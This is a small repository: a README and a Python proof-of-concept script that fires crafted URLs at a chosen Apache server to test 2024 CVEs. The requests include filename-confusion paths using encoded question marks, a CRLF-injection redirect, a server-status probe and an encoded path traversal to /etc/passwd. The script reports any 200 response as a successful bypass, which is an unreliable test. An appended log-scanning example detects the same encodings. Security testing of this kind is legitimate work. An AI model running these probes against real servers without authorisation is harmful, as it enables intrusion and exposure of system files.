├── README.md
└── poc_vulnerability_testing.py


/README.md:
--------------------------------------------------------------------------------
# Apache HTTP Server Vulnerability Testing Tool

This repository provides a **Proof of Concept (PoC)** for testing various vulnerabilities in the Apache HTTP Server, including Filename Confusion Attacks, SSRF, Denial of Service, and others related to recent CVEs. The tool sends crafted HTTP requests to assess whether the server is vulnerable to certain types of attacks.

## Features
- Tests for multiple vulnerabilities including:
  - **CVE-2024-38472**: Apache HTTP Server on Windows UNC SSRF
  - **CVE-2024-39573**: mod_rewrite proxy handler substitution
  - **CVE-2024-38477**: Crash resulting in Denial of Service in mod_proxy
  - **CVE-2024-38476**: Exploitable backend application output causing internal redirects
  - **CVE-2024-38475**: mod_rewrite weakness with filesystem path matching
  - **CVE-2024-38474**: Weakness with encoded question marks in backreferences
  - **CVE-2024-38473**: mod_proxy proxy encoding problem
  - **CVE-2023-38709**: HTTP response splitting
- Provides an easy-to-use command-line interface for testing various endpoints.

## How It Works
The tool performs HTTP requests to potential endpoints that might be vulnerable to confusion attacks or misconfigurations. It checks for specific patterns and encodings that could lead to unauthorized access or system failures.

### Testing Targets
The tool checks for vulnerabilities on the following paths:
- **php-info.php**
- **xmlrpc.php**
- **adminer.php**
- **bin/cron.php**
- **cache/index.tpl.php**
- **cgi-bin/redir.cgi**
- Others with encoded URLs for potential bypass.

## Getting Started

### Prerequisites
- **Python 3.x** installed on your system.
- **Requests** library for Python to send HTTP requests.

You can install the required Python library using:
```bash
pip install requests
```
## Installation
Clone this repository:
```bash
git clone https://github.com/mrmtwoj/apache-vulnerability-testing.git
cd apache-vulnerability-testing
```
### Usage
To use the tool, provide the target URL you want to test:
```bash
python3 poc_vulnerability_testing.py --target http://
```
### For example:
```bash
python3 poc_vulnerability_testing.py --target http://192.168.1.10
```
## Command-Line Arguments
- **target**: The URL of the Apache server to test (e.g., http://example.com).
- **info**: Display tool information, such as the developer name, version, and related CVEs.
- **about**: Display information about the tool and its purpose.


--------------------------------------------------------------------------------
/poc_vulnerability_testing.py:
--------------------------------------------------------------------------------
import argparse

import requests


# Display basic tool information
def display_info():
    info = """
    Developer : ACyber.ir
    Version : 1.0.1
    Develop Time : 5-10-2024
    CVE-2024-38472, CVE-2024-39573, CVE-2024-38477,
    CVE-2024-38476, CVE-2024-38475, CVE-2024-38474,
    CVE-2024-38473, CVE-2023-38709
    """
    print(info)


# Display about information
def show_about():
    about_text = """
    This is a Proof of Concept (PoC) for testing various vulnerabilities
    in Apache HTTP Server including SSRF, Denial of Service, and Filename Confusion Attacks.
    Developed by the A Cyber Security Team.
    """
    print(about_text)


# Function to test the vulnerability with multiple bypass attempts
def check_protected_file(target_url):
    # List of potential attack URLs
    test_urls = [
        f"{target_url}/php-info.php%3fooo.php",  # Filename Confusion: php-info.php
        f"{target_url}/xmlrpc.php%3fooo.php",  # Filename Confusion: xmlrpc.php
        f"{target_url}/adminer.php%3fooo.php",  # Filename Confusion: adminer.php
        f"{target_url}/bin/cron.php%3fooo.php",  # Filename Confusion: cron.php
        f"{target_url}/cache/index.tpl.php%3fooo.php",  # Filename Confusion: index.tpl.php
        f"{target_url}/cgi-bin/redir.cgi?r=http://%0d%0a",  # Invoking Server-Status Handler
        f"{target_url}/server-status",  # Testing server-status handler directly
        f"{target_url}/admin.php%2f%3fooo.php",  # Bypass using alternate encodings
        f"{target_url}/admin.php/%2e%2e%2fetc/passwd",  # Path Traversal Example
    ]

    # Loop through each URL and test the response
    for test_url in test_urls:
        print(f"Testing URL: {test_url}")
        try:
            # A timeout keeps one unresponsive endpoint from hanging the whole run
            response = requests.get(test_url, timeout=10)
        except requests.RequestException as exc:
            print(f"[*] Request failed for URL: {test_url} ({exc})")
            print("-" * 50)
            continue

        # Display response status code and check for potential bypass success.
        # A 200 only shows that the URL was served; confirm any hit manually.
        print(f"URL Status Code: {response.status_code}")
        if response.status_code == 200:
            print(f"[!] Bypass successful for URL: {test_url}")
        else:
            print(f"[*] No bypass or blocked for URL: {test_url}")
        print("-" * 50)


# Function to handle command-line arguments
def parse_arguments():
    parser = argparse.ArgumentParser(description="Apache HTTP Server Vulnerability Testing Tool")
    # --target is optional so that --info and --about can be used on their own
    parser.add_argument('--target', type=str, help='Target URL to test (e.g., http://example.com)')
    parser.add_argument('--info', action='store_true', help='Display tool information')
    parser.add_argument('--about', action='store_true', help='Show about this PoC')
    return parser.parse_args()


if __name__ == "__main__":
    # Automatically display tool info when the script starts
    display_info()

    # Parse command-line arguments
    args = parse_arguments()

    # Display about information if --about is provided
    if args.about:
        show_about()

    # Run the attack check if --target is provided
    if args.target:
        check_protected_file(args.target)
    else:
        if not args.info and not args.about:
            print("Please provide a target URL with --target, or use --info or --about for more information.")

--------------------------------------------------------------------------------
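
A defender-side companion to the request list in `check_protected_file`, added here as an example and not part of the repository: it scans Apache access-log lines for the percent-encoded sequences those probe URLs carry. The log lines are constructed samples, the rule names are hypothetical, and the pattern assumes the raw request line (`%r`) is logged in common/combined format.

```python
import re

# Common/combined log format; group 3 is the raw, still percent-encoded target.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Hypothetical rule names. Scope "path" means only the part before the first
# literal '?'; scope "target" means the whole request target.
RULES = [
    ("encoded-question-mark-in-path", re.compile(r"%3f", re.I), "path"),
    ("encoded-crlf", re.compile(r"%0d|%0a", re.I), "target"),
    ("encoded-dot-segment", re.compile(r"%2e%2e(?:%2f|/)|\.\.%2f", re.I), "path"),
    ("encoded-slash-in-path", re.compile(r"%2f", re.I), "path"),
]

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Oct/2024:10:00:01 +0000] "GET /php-info.php%3fooo.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [05/Oct/2024:10:00:02 +0000] "GET /cgi-bin/redir.cgi?r=http://%0d%0a HTTP/1.1" 403 199',
    '203.0.113.7 - - [05/Oct/2024:10:00:03 +0000] "GET /admin.php/%2e%2e%2fetc/passwd HTTP/1.1" 404 196',
    '198.51.100.4 - - [05/Oct/2024:10:00:04 +0000] "GET /index.php?q=what%3F HTTP/1.1" 200 1024',
]


def classify(target):
    """Return the names of the rules the raw request target matches."""
    path = target.partition("?")[0]
    return [name for name, rx, scope in RULES
            if rx.search(path if scope == "path" else target)]


def scan(lines):
    """Parse access-log lines and return one finding per flagged request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        client, _method, target, status = m.groups()
        rules = classify(target)
        if rules:
            findings.append({"client": client, "target": target,
                             "status": int(status), "rules": rules})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["status"], f["client"], f["target"], ",".join(f["rules"]))
```

The fourth sample line is not flagged because its `%3F` sits in the query string, after a literal `?`, which is ordinary encoding; a flagged request that returned 200 is the one to review first, since that is the condition the tool reports as a bypass.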